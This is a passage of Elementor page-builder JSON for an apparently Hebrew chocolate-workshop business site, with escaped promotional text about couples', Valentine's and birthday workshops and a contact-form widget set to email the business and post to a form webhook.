\\u05e9\\u05de\\u05e9\\u05dc\\u05d1\\u05ea \\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d2\\u05dc\\u05dd \\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05db\\u05d3\\u05d9 \\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd.<\\/span><\\/p><p><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05d4\\u05d9\\u05d0 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05d8\\u05d5\\u05d1\\u05d4 \\u05d5\\u05d4\\u05de\\u05d4\\u05e0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d9\\u05e6\\u05d5\\u05e7 \\u05d5\\u05dc\\u05d9\\u05d9\\u05e6\\u05e8 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05d9\\u05d8\\u05d1 \\u05de\\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e7\\u05e1\\u05d5\\u05dd \\u05d4\\u05d6\\u05d4.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"166379f6\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67476f03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a24081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b7e333a\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"25\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"25\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"field_1\",\"field_type\":\"select\",\"required\":\"true\",\"field_label\":\"\\u05d0\\u05d6\\u05d5\\u05e8\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"25\",\"_id\":\"9497f49\",\"field_options\":\"\\u05de\\u05e8\\u05db\\u05d6\\n\\u05e6\\u05e4\\u05d5\\u05df\\n\\u05d3\\u05e8\\u05d5\\u05dd\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"25\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"yaaripe@gmail.com\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\",\"submit_actions\":[\"email\",\"redirect\",\"webhook\"],\"redirect_to\":\"https:\\/\\/www.chocolate4u.co.il\\/thanks\\/\",\"webhooks\":\"https:\\/\\/hooks.zapier.com\\/hooks\\/catch\\/2852444\\/osyxhok\\/\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fc4d877\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d9f3c43\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e17312a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d1\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd\\u00a0<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u00a0\\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05d0\\u05d9\\u05d6\\u05d4 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05ea\\u05dd \\u05e2\\u05d5\\u05de\\u05d3\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 - \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05d9\\u05d5\\u05dd \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea, \\u05d0\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05d7\\u05d2\\u05d9\\u05d2\\u05d5\\u05ea \\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05e9\\u05dc \\u05db\\u05de\\u05d4 \\u05e9\\u05e0\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3, \\u05d0\\u05d5 \\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d7\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d7\\u05e9\\u05d5\\u05d1 \\u05e2\\u05dc\\u05d9\\u05d5, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d3\\u05e8\\u05da \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05de\\u05d4\\u05e0\\u05d4 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9\\u05ea \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2. <\\/span><br \\/><span style=\\\"color: #000000;\\\">\\u05d0\\u05d9\\u05df \\u05db\\u05de\\u05d5 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9\\u05ea \\u05d5\\u05e9\\u05de\\u05d7\\u05d4 \\u05db\\u05d3\\u05d9 \\u05dc\\u05e9\\u05d3\\u05e8\\u05d2 \\u05dc\\u05db\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2.<\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05dc\\u05d0 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd: \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d1\\u05de\\u05ea\\u05d5\\u05e7<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\"><span style=\\\"text-decoration: underline;\\\"><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd<\\/a><\\/span> \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. <\\/span><br \\/><span style=\\\"color: #000000;\\\">\\u05ea\\u05e0\\u05d5 \\u05dc\\u05e0\\u05d5 \\u05dc\\u05d4\\u05d1\\u05d4\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05de\\u05e9\\u05d4\\u05d5 \\u05dc\\u05e8\\u05d2\\u05e2. \\u05d0\\u05ea\\u05dd \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05db\\u05d9\\u05dd \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e7\\u05d5\\u05e0\\u05d3\\u05d9\\u05d8\\u05d5\\u05e8\\u05d9\\u05dd \\u05d0\\u05d5 \\u05e9\\u05e4\\u05d9\\u05dd, \\u05d5\\u05d2\\u05dd \\u05dc\\u05d0 \\u05d8\\u05d1\\u05d7\\u05d9\\u05dd \\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9\\u05ea. <\\/span><br \\/><span style=\\\"color: #000000;\\\">\\u05d0\\u05ea\\u05dd \\u05d2\\u05dd \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05db\\u05d9\\u05dd \\u05e8\\u05d6\\u05d5\\u05de\\u05d4 \\u05d0\\u05e8\\u05d5\\u05da \\u05e9\\u05e0\\u05d9\\u05dd \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05d0\\u05dc\\u05d0 \\u05e8\\u05e7 \\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1, \\u05e8\\u05e6\\u05d5\\u05df \\u05d8\\u05d5\\u05d1 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3, \\u05e1\\u05e7\\u05e8\\u05e0\\u05d5\\u05ea \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/span><\\/p><p><span style=\\\"color: #000000;\\\">\\u05d4\\u05d9\\u05ea\\u05e8\\u05d5\\u05df \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc \\u05e9\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05db\\u05d6\\u05d5 \\u05d4\\u05d9\\u05d0 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d1\\u05e0\\u05d5\\u05d7\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05dd, \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05ea \\u05de\\u05d9 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2, \\u05d5\\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d0\\u05d9\\u05e0\\u05d8\\u05d9\\u05de\\u05d9\\u05ea \\u05d5\\u05e9\\u05de\\u05d7\\u05d4. \\u05d1\\u05ea\\u05d5\\u05dd \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05d0\\u05d7\\u05e8\\u05d9 \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d0\\u05ea \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd, \\u05ea\\u05e6\\u05d0\\u05d5 \\u05e2\\u05dd \\u05d7\\u05d5\\u05d1\\u05e8\\u05ea \\u05de\\u05ea\\u05db\\u05d5\\u05e0\\u05d9\\u05dd \\u05d5\\u05d4\\u05de\\u05d5\\u05df \\u05d9\\u05d3\\u05e2 \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05db\\u05d0\\u05dc\\u05d5 \\u05d2\\u05dd \\u05d1\\u05d4\\u05de\\u05e9\\u05da.<\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea\\u00a0\\u00a0<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05d4\\u05d9\\u05d0 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05d8\\u05d5\\u05d1\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d4\\u05db\\u05e0\\u05d4 \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d0\\u05d9\\u05e0\\u05d8\\u05d9\\u05de\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05db\\u05d9\\u05dc\\u05d4 \\u05e9\\u05dc \\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd.<\\/span><\\/p><p><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05d0\\u05e4\\u05e9\\u05e8\\u05ea \\u05dc\\u05db\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd, \\u05d1\\u05d0\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05db\\u05e0\\u05ea \\u05e4\\u05d9\\u05e0\\u05d5\\u05e7\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd. \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05db\\u05e0\\u05ea\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e0\\u05e7 \\u05d6\\u05d4 \\u05d0\\u05ea \\u05d6\\u05d5 \\u05d2\\u05dd \\u05d1\\u05d4\\u05de\\u05e9\\u05da. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d0\\u05d6 \\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea, \\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd, \\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3.<\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05e9\\u05e8 \\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d3\\u05e8\\u05da \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05de\\u05d5\\u05d6\\u05de\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d5\\u05d7\\u05d3\\u05ea.<\\/span><\\/p><p><span style=\\\"color: #000000;\\\"><span style=\\\"text-decoration: underline;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/valentine-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4<\\/a><\\/strong><\\/span> \\u05d4\\u05d9\\u05d0 \\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05d4\\u05db\\u05e0\\u05d4 \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05dc\\u05de\\u05d9\\u05d3\\u05d4 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e2\\u05d5\\u05e9\\u05d4 \\u05dc\\u05e0\\u05d5 \\u05e9\\u05de\\u05d7, \\u05d5\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05ea\\u05d5\\u05da \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4.<\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05d0\\u05d9\\u05df \\u05e1\\u05e4\\u05e7 \\u05e9\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05dc\\u05d0\\u05d7\\u05d3 \\u05de\\u05d1\\u05e0\\u05d9 \\u05d4\\u05d6\\u05d5\\u05d2, <span style=\\\"text-decoration: underline;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"http:\\/\\/chocolate4u.co.il\\/chocolate-workshops\\/birthday-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea<\\/a> <\\/strong><\\/span>\\u05d4\\u05d9\\u05d0 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05d8\\u05d5\\u05d1\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8. \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d9\\u05e0\\u05d8\\u05d9\\u05de\\u05d9\\u05ea \\u05e8\\u05e7 \\u05e9\\u05e0\\u05d9\\u05db\\u05dd \\u05d9\\u05d7\\u05d3, \\u05d5\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05de\\u05e9\\u05e4\\u05d7\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05d9\\u05ea\\u05db\\u05dd. \\u05db\\u05dc 